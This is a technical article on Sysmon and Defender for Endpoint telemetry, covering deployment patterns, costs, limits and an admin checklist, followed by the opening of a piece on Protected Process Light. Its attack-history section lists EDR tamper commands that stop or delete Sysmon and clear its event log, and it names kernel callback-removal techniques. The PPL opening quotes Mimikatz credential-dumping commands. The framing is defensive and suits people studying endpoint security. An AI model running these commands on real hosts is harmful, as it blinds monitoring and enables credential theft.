The detection-engineering-community pattern. Run MDE as the primary EDR. Run Sysmon alongside it with olafhartong/sysmon-modular's sysmonconfig-mde-augment.xml configuration, whose explicit README design intent is "intended to augment the information and have as little overlap as possible" with MDE [@github-hartong-modular]. The augment config drops the EIDs MDE covers cleanly (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8 with full SourceImage, 9 RawAccessRead, 10 with full GrantedAccess mask, 15 FileCreateStreamHash, 17-18 PipeEvent, 19-21 WmiEvent, 23 with archive variant on narrowly-scoped paths). The result is a Sysmon event-log stream that is purpose-built to complement MDE's Kusto stream, not duplicate it.

Key idea: If you are an MDE-licensed shop with a detection-engineering team and you are not running Hartong's sysmonconfig-mde-augment.xml, you are paying for two EDRs and getting the coverage of one. The augment config was purpose-built to make Sysmon's verbose-field surface complementary to MDE's cloud-correlation surface, not a duplicate. Standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds: double telemetry volume, double licensing exposure, and no incremental detection coverage.

Cost and operational complexity

The three options have different operational profiles. The summary table:

Pattern	License posture	Telemetry volume	Operational complexity	Best used for
A. Sysmon only	None (free)	Medium (depends on config)	Low (one product, one config)	Air-gapped, regulatory-no-cloud, unlicensed
B. MDE only	MDE Plan 1 or Plan 2	Cloud-controlled (no per-host volume bill)	Low (one product, Microsoft-managed)	Most MDE-licensed orgs without detection-engineering team
C. MDE + Hartong augment	MDE Plan 2 + WEF or SIEM	High on Sysmon side (verbose EIDs); low on MDE side	High (two products, modular config, WEF or SIEM forwarder)	Detection-engineering-mature SOCs

A small operational caution: standalone Sysmon next to MDE without the augment-specific exclusions is the worst of three worlds. The drivers coexist fine at different Filter Manager altitudes, but the event log and downstream collector now carry every Sysmon EID the default config emits plus everything MDE collects on the cloud side. The double-pay problem the KeyIdea calls out is not theoretical; it shows up the first month a SOC team forgets to swap the default sysmonconfig.xml for sysmonconfig-mde-augment.xml.

The Hartong-augment-with-MDE pattern carries a second cost: the ETW manifest-provider session cap. Windows allows up to eight trace sessions to enable and receive events from the same manifest-based provider [@ms-etw-limits]; the EtwTi security provider, Microsoft Defender Antivirus auto-start sessions, and any WPR sessions a developer might spin up all compete for that shared pool. Adding Sysmon's session takes one. On a host with a third-party EDR that already consumes several sessions against the same provider, this can cause silent telemetry loss. Audit logman query -ets regularly.

The volume math

For sizing, assume a typical Windows endpoint generates roughly 20,000 process-create events per day under steady state (developer workstations are in this range; server volumes are higher; air-gapped jump boxes are lower) [@github-tsale-edr-telem]. The Hartong-augment config drops the top three high-volume EIDs (1 ProcessCreate, 7 ImageLoad, 11 FileCreate) that MDE already collects, retaining only the verbose surfaces. That cuts Sysmon volume by roughly 70 to 85 percent relative to a default-config Sysmon deployment, leaving only the verbose-EID stream (8, 10, 17-18, 19-21) MDE does not surface.

This is the operational answer to the question. For organisations with detection-engineering teams, Option C is the default. For organisations without, Option B is the default. Option A is correct in a narrow set of contexts and should be picked on purpose. The next two sections turn from the layered architecture to the layered attack surface, because every defense has an attacker.

11. The Attack Tradition: Telemetry Suppression on Both Halves of the Pipeline

If you run an EDR on a host, you have made a bet that the EDR can survive contact with an attacker who knows it is there. The history of that bet -- on both halves of the pipeline -- is a chronological story with named techniques and named CVEs. Twelve years of attack tradition reduce to a small number of attack classes plus the structural defenses that closed each one.

Sysmon-side attacks, in order

The earliest tampering technique for Sysmon was the most obvious: stop the driver. Until Sysmon v15 in June 2023, the Sysmon service was a normal Windows service, and a SYSTEM-privilege attacker had several easy options:

sc stop sysmon and sc delete sysmon to unload SysmonDrv.sys.
Rewrite the minifilter altitude so Sysmon loads after a tamper hook.
wevtutil cl Microsoft-Windows-Sysmon/Operational to erase history.
Rewrite SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters to re-program Sysmon's filter without restarting it.
Register a Windows event-channel ACL change to silence Microsoft-Windows-Sysmon.

A small family of community-published tools automated this class. The structural defense, before v15, was discipline: keep SYSTEM out of attacker hands.

The June 2023 v15 protected-process gate is the structural response to this entire class. Microsoft Learn states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. A SYSTEM-privilege attacker can no longer OpenProcess(PROCESS_TERMINATE) against Sysmon.exe, inject code into the service's address space, or attach a user-mode debugger. The class is not closed -- a kernel primitive still works, and a BYOVD chain that can write _EPROCESS.Protection defeats the gate -- but the bar moves from "a wevtutil command in a PowerShell window" to "a kernel exploit primitive."

MDE-side attacks, in order

The MDE-side attack tradition starts at the Antimalware-PPL boundary on MsSense.exe. The FalconForce 2022 work this article has already cited multiple times is the dispositive primary [@falconforce-2022]. The verbatim TL;DR -- describing how raising dbgsrv.exe to WinTcb PPL lets researchers debug MDE and capture cloud-bound payloads, which surfaced a missing-authorization vulnerability allowing spoofed telemetry to any M365 tenant -- landed earlier as the §6 PullQuote and is the framing this section builds on.

The technique used a PPLKiller-class BYOVD chain to raise dbgsrv.exe to WinTcb PPL, attach to MsSense.exe, and capture plaintext payloads via SspiCli!EncryptMessage instrumentation. The vulnerability that work disclosed, CVE-2022-23278, was patched on March 8, 2022 [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. That patch closed one missing-authorization gap in the cloud-side trust model. It did not close the class.

The InfoGuard Labs 2025 follow-up [@infoguard-2025] demonstrated that the broader class is still open. The technique they used was different -- in-memory patching of CRYPT32!CertVerifyCertificateChainPolicy to disable certificate-pinning validation, rather than PPL-elevated debugging -- but the vulnerability they surfaced is the same class: cloud endpoints (/edr/commands/cnc and /senseir/v1/actions/) that do not properly validate authentication tokens on traffic claiming to originate from the endpoint. As §7 documented, the MSRC disposition was low severity, no fix committed -- the operational consequence is that the spoofed-telemetry trust pattern that produced CVE-2022-23278 in 2022 is, three years later, still exploitable along a parallel surface.

The broader attack class -- ETW Threat Intelligence (EtwTi) blinding -- has been studied independently of MDE. The structural answer in 2026 is HVCI plus VBL plus Antimalware-PPL plus ELAM (the four-component hardening stack). On a fully-hardened endpoint, the user-mode tamper surface that defined the 2014-to-2020 era of EDR-blinding tradecraft is largely closed; the residual attack surface is kernel-mode adversary primitives. That is the structural ceiling §12 picks up.

Cross-pipeline attacks

Some attacks affect both halves of the pipeline simultaneously. The most-cited is BYOVD-driven kernel-callback removal: a Bring-Your-Own-Vulnerable-Driver chain loads a Microsoft-signed but vulnerable driver, exploits a known CVE in the driver, and from kernel context calls PsSetCreateProcessNotifyRoutineEx with a Remove = TRUE flag against the EDR sensor's registered callbacks, effectively unhooking both Sysmon and MDE at the kernel-callback layer. The structural defense Microsoft shipped in response is the Microsoft Vulnerable Driver Blocklist with HVCI enforcement, which has been on by default since Windows 11 22H2 [@ms-driver-blocklist].

A second cross-pipeline attack is direct-syscall bypass of user-mode hook libraries -- but this attack is mostly a relic from the 2010s when EDR vendors relied on ntdll.dll user-mode IAT hooks; modern Sysmon and MDE neither register nor depend on user-mode hooks for the kernel-callback events. Direct-syscall malware that bypasses the user-mode hooks of a third-party EDR will still produce a Sysmon EID 1 and an MDE DeviceProcessEvents row, because the kernel-callback fires whether or not the malware called NtCreateUserProcess via ntdll.dll.

The attack-surface lattice

flowchart TD A1["Sysmon-side: sc stop, wevtutil clear, registry altitude swap"] --> D1[Sysmon v15 protected-process gate] A2["MDE-side: PPLKiller + dbgsrv WinTcb to attach MsSense"] --> D2["Antimalware-PPL on MsSense.exe"] A3["Cloud-side: CVE-2022-23278 spoofed cloud telemetry"] --> D3["MSRC patch March 8 2022"] A4["Cloud-side: InfoGuard 2025 cert-pinning bypass + missing auth"] --> O4["OPEN: 'low severity, no fix committed'"] A5["Cross-pipeline: BYOVD kernel-callback unhook"] --> D5["HVCI + Vulnerable Driver Blocklist (Win11 22H2+)"] D1 --> R["Residual: kernel-mode adversary primitive that defeats HVCI + VBL"] D2 --> R D5 --> R D3 --> R O4 -.unclosed.-> R

The shape of the lattice is the shape of the field's hardening: every user-mode attack class has a structural defense, and the structural defenses converge on a single residual -- the kernel-mode adversary primitive that defeats HVCI plus the Vulnerable Driver Blocklist. On the cloud side, the InfoGuard 2025 finding is the unresolved item -- the same trust pattern that produced CVE-2022-23278 in 2022 produced a different cluster of missing-authorization bugs three years later. The attack-defense arc is still moving, and the two-sided nature of the pipeline (host + cloud) is why.

Every attack surface has a structural defense. But every defense has a horizon. What is outside the horizon?

12. Theoretical Limits: What the Pipeline Cannot See

Sysmon and Microsoft Defender for Endpoint are observation pipelines, not enforcement layers. That statement contains four structural ceilings the engineering cannot lift. These are not bugs to be fixed; they are properties of the architecture that follow from the choice of where the pipeline collects.

Ceiling 1: The pre-driver-load horizon

Both Sysmon's SysmonDrv.sys and Defender for Endpoint's WdBoot.sys are kernel drivers, but they sit at different points in the boot order. WdBoot.sys is ELAM-signed and loads before any non-ELAM driver, which lets it classify subsequent boot-start drivers as Good, Bad, or Unknown for the kernel's load decision. (Measured Boot separately hashes WdBoot.sys along with the bootloader and kernel into TPM PCRs; that integrity-attestation channel is a sibling feature, not ELAM's own job.) SysmonDrv.sys is BootStart-ordered but not ELAM-signed -- it loads early, but not first.

Events that happen before the EDR driver's DriverEntry runs are not observable by that driver. For Sysmon, that means rootkit-class malware that loads inside the early Windows boot path (UEFI bootkits, boot-record manipulation, very-early kernel modifications) is invisible until after Sysmon catches up. For MDE, the ELAM-signed WdBoot.sys closes most of this window for non-ELAM drivers; the residual is anything that runs even earlier -- UEFI-firmware-resident malware, hardware-implant attacks, the very narrow class that targets the pre-ELAM trust boundary itself. The Measured Boot plus Secure Boot stack (covered in adjacent articles in this series) is what observes the pre-ELAM region. EDR's reach does not extend below the ELAM line.

Ceiling 2: The observation-vs-enforcement latency gap

Sysmon's kernel-callback to event-log latency is sub-millisecond. The driver runs the rule engine, decides to emit, and writes through the ETW publisher to the Sysmon service. The service writes to the event log. The total path is microseconds in the best case, milliseconds under load.

MDE's end-to-end latency to a queryable Kusto row is seconds to tens of seconds. The endpoint side takes microseconds; the TLS hop to regional ingest takes the dominant fraction of a second; the Kusto write and per-tenant indexing takes the rest. Microsoft's own Advanced Hunting documentation phrases the freshness contract carefully: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, longer under load, and indefinite when the endpoint cannot reach the cloud.

Any payload that completes its work inside the observation window has executed before the SIEM rule could fire. A mimikatz.exe invocation that dumps LSA secrets in three milliseconds, exfiltrates them over a covert DNS channel in 800 milliseconds, and exits in another two milliseconds has produced a complete attack chain before MDE's event has reached Kusto, let alone before the Maya-class analyst has glanced at her console. The hybrid responses that blur this boundary -- Sysmon v14's FileBlockExecutable (EID 27), MDE's ASR rules and Network Protection -- are kernel-callback-time decisions, not SIEM-rule-time decisions; they run inside the few-microsecond window the driver itself owns, and they are constrained by the rule logic baked into the host configuration rather than by the live correlation logic of the cloud-side detection engine.

Ceiling 3: MDE schema truncation versus Sysmon manifest

This is the ceiling §8 quantified column-by-column. The Device* tables surface a normalized, mostly-complete cross-walk of Sysmon's manifest -- but mostly-complete is not the same as complete. The ProcessAccess GrantedAccess mask is the most-cited example: Sysmon EID 10 captures the full 32-bit PROCESS_ACCESS_MASK (which discriminates between PROCESS_QUERY_INFORMATION, PROCESS_VM_READ, PROCESS_CREATE_THREAD, and so on -- the canonical malicious patterns are visible in this mask), while MDE's DeviceEvents OpenProcessApiCall ActionType collapses the mask into a coarser categorization. The WmiEvent consumer expressions Sysmon EIDs 19-21 capture verbatim -- which are how WMI-based persistence is detected -- are not surfaced in the Device* schema at all. RawAccessRead (EID 9, the canonical disk-level credential-theft observable) is omitted. PipeEvent (EIDs 17-18) is omitted.

Hartong's sysmonconfig-mde-augment.xml exists precisely because of this asymmetry. The augment config is a community-curated artifact whose purpose is to fill the schema-truncation gap. The cost: a second telemetry stream on the host. The benefit: detection-engineering visibility into the verbose-EID surface MDE drops.

Ceiling 4: The kernel-mode adversary primitive

A ring-0 attacker with a working kernel primitive -- a memory-write capability into the kernel data structures, typically delivered via BYOVD against a vulnerable signed driver -- can defeat the pipeline as a consequence of defeating the structural defenses that protect it. Specifically:

Direct call to PsSetCreateProcessNotifyRoutineEx with Remove = TRUE unregisters the EDR sensor's callback, after which CreateProcess events on that host produce no observable.
A patch to the _EPROCESS.Protection field of MsSense.exe or Sysmon.exe strips the Antimalware-PPL gate, after which user-mode attacks against the service work again.
A direct write into the EtwTi provider's keyword mask zero-pages the security-event-emission surface, after which the kernel-side EtwTi consumer (which several EDRs subscribe to) sees no events even when the underlying behaviour fired.

The "Tampering with Windows Event Tracing" research published by Palantir in 2018 (Matt Graeber's canonical writeup) and the follow-on EtwTi-blinding tradition is the published primary for this attack class [@palantir-etw-tampering-2018]. The structural defenses are HVCI plus VBL plus Antimalware-PPL plus ELAM. But the four-component hardening stack does not prevent a kernel-mode adversary primitive from defeating the EDR; it only raises the bar to needing a kernel-mode adversary primitive.

Observation requires execution overhead, and execution requires the observer to live in the same trust domain as the observed. A kernel-mode observer (Sysmon, MDE) lives in the same kernel trust domain as the kernel-mode attacker; a hypervisor-rooted observer (`EtwTi` running under Virtualization-Based Security) shifts the trust boundary up one level, but does not eliminate it -- the observer-in-VBS is still subject to attacks on the hypervisor itself. There is no architectural place to put the observer that is strictly outside the attacker's reach unless the observer is in different hardware, which is what hardware-rooted Root-of-Trust attestations attempt and what an Anti-Tamper Service Provider (ATSP) is being defined for. EDR sensors will always be co-resident with the adversary at *some* trust boundary. The ceiling is structural.

Four ceilings, four sets of open questions. What is the field working on right now?

13. Open Problems and Active Work

Some questions in this article have no answer in 2026. Five of them are where the field will move next.

The MDE kernel-callback inventory

As §6's aha-moment Callout established, Microsoft has not published a kernel-callback inventory for the MDE EDR sensor, which is the structural reason Hartong's sysmonconfig-mde-augment.xml exists as a community-curated artifact rather than a Microsoft-published reference. What §13 adds is the empirical scaffolding the community uses in the absence of that inventory: the MITRE Engenuity Round 6 (2024) evaluation results [@ms-mitre-2024-blog] plus the Shen et al. whole-graph re-analysis [@arxiv-shen-2024] are the closest published evidence of which MDE detection paths produced an alert during a known emulated technique. Neither covers an end-to-end kernel-callback enumeration comparable to Sysmon's manifest -- they cover outputs (alerts produced) rather than mechanisms (callbacks registered). Closing this gap would require either Microsoft to publish a per-ActionType-to-per-kernel-callback cross-walk for the Device* schema, or the community to fund and publish a reverse-engineered inventory that goes meaningfully past the FalconForce 2022 and InfoGuard 2025 slices. As of 2026, neither has happened.

Defender XDR built-in detection rule logic

The AlertInfo and AlertEvidence table schemas are published; the underlying rule logic that produces alerts in these tables is not. Microsoft ships "Microsoft-authored detection rules" as part of Defender XDR Plan 2, and the rules update continuously without an obvious public changelog. The community workaround is to subscribe to the MITRE ATT&CK evaluation rounds (the most recent being Round 6 in 2024 [@ms-mitre-2024-blog][@arxiv-shen-2024]) and infer rule coverage from per-technique detection scores, but this is indirect and lossy. A published rule-logic catalogue would let detection-engineering teams reason about which custom rules are duplicates of Microsoft's authored content and which fill genuine gaps.

Cross-tenant hunting and data sovereignty

MSSPs (managed-security service providers) routinely need to hunt across multiple customer tenants for shared-IOC observations. Microsoft's official multi-tenant story is Microsoft Defender XDR Multitenant Management (in GA) plus Azure Lighthouse for cross-tenant Sentinel access. Both are functional and both are documented at the operational level. The deeper question -- what is the GDPR/HIPAA/FedRAMP framework around hunting an IOC observed in Tenant A against telemetry held in Tenant B's regional Kusto cluster? -- is unsettled. The data-residency commitments Microsoft makes per region [@ms-server-endpoints-learn] do not directly answer the cross-tenant-hunt question. Vendor and customer guidance is still maturing.

A Microsoft-published reference MDE-augmentation Sysmon config

Hartong's config is the community answer to the question "what Sysmon EIDs should I emit on a host that already has MDE?" There is no Microsoft-published reference equivalent. This is the most surgical near-term improvement Microsoft could make. Publishing such a config -- even as a starting-point template, not a binding recommendation -- would compress an entire detection-engineering conversation into a single endorsed artifact. The political reason it has not happened is partly that Microsoft does not officially recommend running Sysmon alongside MDE; the operational reality is that detection-engineering-mature shops do anyway.

Cross-platform parity

Sysmon for Linux (microsoft/SysmonForLinux, created October 28, 2020 and publicly announced in October 2021) ships an eBPF-based implementation of the same XML schema and emits to syslog [@github-sysmon-linux]. It is a substantial subset of the Windows manifest -- process create, file write, network connect, image load, raw access read -- with the cross-OS shared XML rule grammar going for it, so a detection-engineering team can write one Sigma-aligned rule and run it against both Windows and Linux endpoints with minor token substitutions. Full parity between the Windows kernel-callback Sysmon and the Linux eBPF Sysmon is not the design intent; the Linux port intentionally captures only the EIDs that map cleanly onto eBPF observables. BTFHub plus SysinternalsEBPF (the in-tree CO-RE infrastructure the Linux port uses) make per-kernel-version deployments tractable, but the field has not yet converged on a single canonical Linux config the way it converged on SwiftOnSecurity for Windows.

These five open problems are where the field will move in the next five years. In the meantime, what does the analyst do on Monday morning?

14. Seven Things to Do Monday Morning

Everything above has been background. Here is the operational checklist. Each step is anchored to a primary citation. Walk all seven on a single non-production host before fleet rollout; the ninety-second triage walk from §1 is best learned by reproducing it once on your own tenant.

1. Verify the MDE sensor service is healthy

Run as Administrator on the endpoint:

sc query sense

A healthy result shows STATE: 4 RUNNING and WIN32_EXIT_CODE: 0. If the result is STATE: 1 STOPPED or the service is missing entirely, consult the WDATPOnboarding event source in the Application event log for events 5, 10, 15, 30, 35, 40, 65, and 70 -- each has a documented resolution procedure [@sense-troubleshoot]. On Windows Server 2019, 2022, 2025, or Azure Stack HCI 23H2 or later, also verify the Feature on Demand is installed:

DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~

The result should show State : Installed and Version : 10.x.x.x. If State : NotPresent, install the FoD before proceeding.

2. Open Advanced Hunting and run the §8 query

Navigate to defender.microsoft.com (or the legacy security.microsoft.com), expand Hunting > Advanced hunting, paste the §8 KQL query, and run it [@advanced-hunting-overview]. On a fresh tenant the query may return zero rows -- that is the correct result for a healthy environment. Tighten the time window if it is slow (Timestamp > ago(1h) instead of ago(24h)) until the query returns within ten seconds. The point of this step is to confirm the read surface is reachable and that the user has Hunter (or higher) RBAC permission on the tenant.

3. If licensed for Sentinel, install the Defender XDR connector

In the Microsoft Sentinel workspace, navigate to Data connectors, choose Microsoft Defender XDR, and configure per-table streaming [@sentinel-xdr-connector]. Pick the tables your team needs longer retention or analytics-rule scheduling on; leave the others to in-portal Advanced Hunting. Be aware that enabling the connector "automatically disconnects" any legacy Microsoft Defender component connectors during enablement; this is the cleanup detail to plan for during migration windows [@sentinel-xdr-connector].

4. If deploying Sysmon alongside MDE, start from the augment config

Clone olafhartong/sysmon-modular, build the sysmonconfig-mde-augment.xml variant, and deploy with:

Sysmon64.exe -accepteula -i sysmonconfig-mde-augment.xml

Verify the active configuration with Sysmon64.exe -c and confirm the rule count matches the augment config's expected output [@github-hartong-modular].

5. If deploying Sysmon standalone, start from NextronSystems or modular default

For air-gapped or unlicensed environments, clone NextronSystems/sysmon-config (the post-2021-rename successor to Neo23x0/sysmon-config) and deploy sysmonconfig.xml or, for the blocking-rule variant, sysmonconfig-export-block.xml [@github-neo23x0][@github-nextronsystems-meta]. Alternatively, olafhartong/sysmon-modular's default sysmonconfig.xml (built from the modular library) is the right choice if you want fine-grained per-technique tuning later [@github-hartong-modular].

6. Verify Sysmon v15.2 or later is running

Sysmon64.exe -c

The output's header line should show the binary version. Anything v15.x or later has the protected-process gate enabled [@sysmon-ms-learn][@bleepingcomputer-sysmon15]. Anything older is trivially blindable by a SYSTEM-privilege attacker and is the single biggest deployment-hygiene risk in the Sysmon population today.

7. Audit the MDE onboarding registry hives

Compare the live registry values to the expected onboarding state:

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
reg query "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Unexpected changes -- particularly a change to the onboarding OrgId or to the policy-controlled Disabled value -- are an indicator that the tenant or device has been re-targeted, possibly by an attacker who obtained admin-level access and is attempting to re-route the endpoint's telemetry to a different tenant or to disable the MDE sensor entirely [@sense-troubleshoot]. Set up a Sentinel detection rule on DeviceRegistryEvents with RegistryKey contains "Windows Advanced Threat Protection" to surface this class of tampering automatically.

Note: Walk steps 1 and 2 on a single non-production host before fleet rollout. The ninety-second-triage walk you saw in §1 is best learned by reproducing it once on your own tenant. The cost of getting steps 4-6 wrong (deploying the wrong Sysmon config on a high-volume server fleet) is hours of operational pain; the cost of doing them right on a single test host first is twenty minutes.

The MDE sensor service has not been onboarded on this host. Two common causes: (1) the endpoint is on a Windows Server SKU and the SENSE Feature on Demand has not been installed; run the DISM `Get-CapabilityInfo` check in step 1 to confirm. (2) The onboarding script (the `WindowsDefenderATPLocalOnboardingScript.cmd` or the equivalent Group Policy / Intune / SCCM artifact) has not been run on this host. The MDE settings page in the Defender XDR portal shows the per-device onboarding artifacts under **Settings > Endpoints > Onboarding** for download [@sense-troubleshoot].

The Defender XDR portal also exposes a device timeline view that surfaces a chronological event stream per device without requiring KQL. This is the right view for analysts who are still learning the schema; the KQL surface is the right view for repeatable hunts and detection-rule authoring.

Seven steps, one Monday. The rest of the questions are in the FAQ.

15. Frequently Asked Questions

Seven of the questions that come up every time this material is taught.

Yes on its output side; mostly no on its input side. Sysmon publishes its events through an ETW provider called `Microsoft-Windows-Sysmon`, which is how downstream collectors and the Windows Event Log service consume the data. On its *input* side, Sysmon is a kernel driver that collects via five different mechanisms -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load and driver load, `PsSetCreateThreadNotifyRoutineEx` for remote-thread creation, `ObRegisterCallbacks` for cross-process access, `CmRegisterCallbackEx` for registry, and Filter Manager minifilters for ordinary file system and NPFS named pipes. Two exceptions live on Sysmon's input side. The single kernel-ETW consumer is `Microsoft-Windows-DNS-Client` for EID 22 DNSEvent; the WmiEvent family (EIDs 19-21) is implemented in a consumer style against the WMI activity provider's user-mode tracing surface. Calling Sysmon "ETW-based" without that distinction is the most common architectural confusion in the field [@sysmon-ms-learn]. For most organizations licensed for MDE Plan 2 and without a mature detection-engineering team, yes -- MDE alone is the right baseline. For organizations with a detection-engineering team, the community pattern is to deploy MDE *plus* a tuned Sysmon configuration (specifically Olaf Hartong's `sysmonconfig-mde-augment.xml`) that fills the gaps where MDE's `Device*` schema truncates or omits fields that Sysmon's manifest captures verbatim -- the `ProcessAccess` GrantedAccess mask, the full WMI consumer expressions, RawAccessRead, the pipe events, and selected file-delete archival paths. The wrong answer for an MDE-licensed shop with a detection-engineering team is to do nothing on the Sysmon side; the second-wrong answer is to deploy *default* Sysmon alongside MDE, which produces double the telemetry volume for the coverage of one [@github-hartong-modular][@mde-ms-learn]. The five class-specific `Device*` tables (`DeviceProcessEvents`, `DeviceNetworkEvents`, `DeviceFileEvents`, `DeviceImageLoadEvents`, `DeviceRegistryEvents`) each map onto a single Sysmon EID family and present a normalized, per-class set of columns. `DeviceEvents` is the miscellaneous catch-all: AMSI scan results, exploit-protection events, Defender Antivirus operational events, Attack Surface Reduction rule fires, Network Protection blocks, OpenProcess API calls, and other MDE-specific telemetry surface here under different `ActionType` values. If a row's `ActionType` does not match what you expected, the row is probably in `DeviceEvents` rather than the table you searched first [@advanced-hunting-overview]. No. The historical root is SwiftOnSecurity's `sysmon-config`, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. Florian Roth (`@Neo23x0`) forked SwiftOnSecurity's repository in January 2018 and added blocking-rule support, community pull-request merges, and the maintainer roster that now includes Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali [@github-neo23x0]. The Neo23x0 repository was renamed to `NextronSystems/sysmon-config` on July 24, 2021 [@github-nextronsystems-meta]; the old URL HTTP-301 redirects to the new one and the content lineage from SwiftOnSecurity is unchanged. Calling Roth's config "the original" is the inverse of the truth; calling it "the canonical actively-maintained fork" is closer. No. Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Olaf Hartong's modular workflow generates a single merged XML at build time from a per-technique module library; the production fleet receives that single XML and the driver enforces it. If you want two configurations -- one for the SOC team's hunting, one for the platform team's audit -- merge the rules at build time and ship the combined product [@github-hartong-modular]. Because it runs as Antimalware Protected Process Light (`PROTECTED_ANTIMALWARE_LIGHT`), the Windows kernel rejects ordinary user-mode `OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)` requests against the process from any caller that does not itself run at an equal or higher signer level. The published reverse-engineering technique (FalconForce 2022) is to raise the Windows PE debug server `dbgsrv.exe` to the `WinTcb` signer level via a PPLKiller-class kernel primitive, then attach the elevated debug server to `MsSense.exe`. That technique requires a kernel-mode primitive (commonly a BYOVD chain), which is itself non-trivial. The protection level is the structural defense; the debug-server technique is the dispositive community workaround [@falconforce-2022]. Thirty days of raw data in the Defender XDR portal: "*Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data*" [@advanced-hunting-overview]. Beyond thirty days, retention is configurable per workspace via the Microsoft Sentinel Defender XDR connector; the Log Analytics workspace archive tier supports up to twelve years of per-table archive on a per-GB-billed basis [@sentinel-xdr-connector][@ms-log-analytics-archive]. The two surfaces are not exclusive; the common operational pattern is in-portal for the hunting team (30 days, no per-GB cost) plus per-table Sentinel streaming for the analytics-rules team (extended retention, per-GB cost on selected tables).

These are the questions. The seven layers between Maya's cmd.exe at 9:14 a.m. and her Kusto row at 9:14:03 are how the answers actually work -- a kernel callback, a user-mode aggregator, an ETW publisher or TLS-pinned cloud forwarder, a regional Kusto ingest, a table write, and a KQL read, with two structural defenses (Antimalware-PPL and the Sysmon v15 protected-process gate) keeping each layer honest. Every other detection-engineering pattern in the Windows field is a configuration of those seven layers, and most of the open problems are at the seams between them.

See also. The Sysmon driver's collection layer leans on the kernel-callback APIs documented in the Windows process mitigations and Object Manager namespace articles in this series. The ETW transport bus that Sysmon publishes onto -- and that EtwTi security events surface through -- is the subject of the dedicated ETW article in this series; the article goes deeper on provider GUIDs, manifests, and the eight-trace-session manifest-provider cap that bounds Sysmon's coexistence story in §10. The AMSI primary path that produces DeviceEvents ActionType = "AmsiScriptDetection" is the subject of the AMSI article; the two pipelines are siblings, not substitutes. And the Sigma rule corpus that compiles down into KQL for Defender XDR / Sentinel hunting is the same Sigma corpus that compiles into Splunk SPL and Elastic EQL -- the vendor-neutral query layer that sits above this article's KQL surface [@github-sigma].

Protected Process Light: When the Administrator Isn't Enough

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**Windows Protected Process Light (PPL) re-asks the question of who can touch whom one level below the token model.** A single byte in `EPROCESS` packs a process's protection type, audit bit, and signer rung; the kernel's lattice check inside `NtOpenProcess` rejects memory-read attempts from below the target's rung even when the caller is SYSTEM with `SeDebugPrivilege` enabled. Every public bypass since 2018 lives in one structural class -- the kernel verifies the channel by which code enters a PPL, not the behaviour of that code once mapped -- which is why Microsoft classifies PPL as defense in depth rather than a security boundary, and why Credential Guard / `LsaIso.exe` is its necessary VBS-anchored companion.

1. Mimikatz on a Protected Box

A red team operator has done everything right. The shell is SYSTEM-integrity. SeDebugPrivilege is enabled in the token. whoami /priv shows every privilege Windows defines. The operator types mimikatz.exe, then privilege::debug -- OK. Then sekurlsa::logonpasswords -- and Mimikatz answers:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory : (0x00000005) Access is denied

The mechanism that just denied them is not a privilege check at all. It is not an ACL decision. It is not the integrity-level mediator. itm4n recreated exactly this failure in 2021 against a vanilla Windows install with one registry value set [@itm4n-runasppl]. The error code 0x00000005 is ERROR_ACCESS_DENIED -- the Win32 surface that GetLastError exposes for the kernel's NTSTATUS STATUS_ACCESS_DENIED = 0xC0000022. The kernel returns the NTSTATUS out of NtOpenProcess before the security descriptor of lsass.exe has been consulted; RtlNtStatusToDosError then maps it to the Win32 0x5 that surfaces in kuhl_m_sekurlsa.c.

A kernel-enforced gating model that decorates a process with a *protection level* -- a structured byte combining a type field, an audit bit, and a signer rung -- and rejects `OpenProcess` requests from callers whose protection level is below the target's, regardless of token privileges or security-descriptor ACLs.

Picture the scenario concretely. A 2026 red-team engagement against a hardened Windows 11 24H2 endpoint. RunAsPPL audit-mode is on by default after the Windows 11 22H2 rollout extended audit-default to consumer SKUs [@learn-runasppl]. A third-party EDR daemon is already running, signed at the Antimalware rung via the vendor's Microsoft Virus Initiative enrollment. The operator owns local administrator. The operator has SYSTEM. The operator holds every privilege Windows defines. They still cannot read a single byte of LSASS memory.

The denial trace, walked carefully, looks like this. Mimikatz calls OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid). The Win32 thunk lands on NtOpenProcess, which dispatches to the object-manager callback PspProcessOpen. That callback calls PspCheckForInvalidAccessByProtection, which calls RtlTestProtectedAccess against the caller's EPROCESS.Protection byte and the target's EPROCESS.Protection byte. The lattice test fails. The kernel strips PROCESS_VM_READ from the requested mask. With the surviving limited mask, the request continues into SeAccessCheck, but Mimikatz never wanted the limited mask; it wanted to read memory. The handle returned (or the failure path taken) gives Mimikatz exactly the path that produces 0x00000005 in kuhl_m_sekurlsa.cThe relevant commit is fe4e98405589e96ed6de5e05ce3c872f8108c0a0, cited by itm4n as the source for the exact failure path that yields 0x00000005 [@mimikatz-sekurlsa]..

sequenceDiagram participant Mim as Mimikatz (SYSTEM, SeDebugPrivilege) participant K32 as kernel32 / OpenProcess participant NtOP as NtOpenProcess participant PsPO as PspProcessOpen participant CHK as PspCheckForInvalidAccessByProtection participant Lat as RtlTestProtectedAccess participant SAC as SeAccessCheck

Mim->>K32: OpenProcess(PROCESS_VM_READ, lsass)
K32->>NtOP: syscall NtOpenProcess
NtOP->>PsPO: object-manager callback
PsPO->>CHK: check caller.Protection vs target.Protection
CHK->>Lat: lattice rule (signer rungs)
Lat-->>CHK: full mask denied
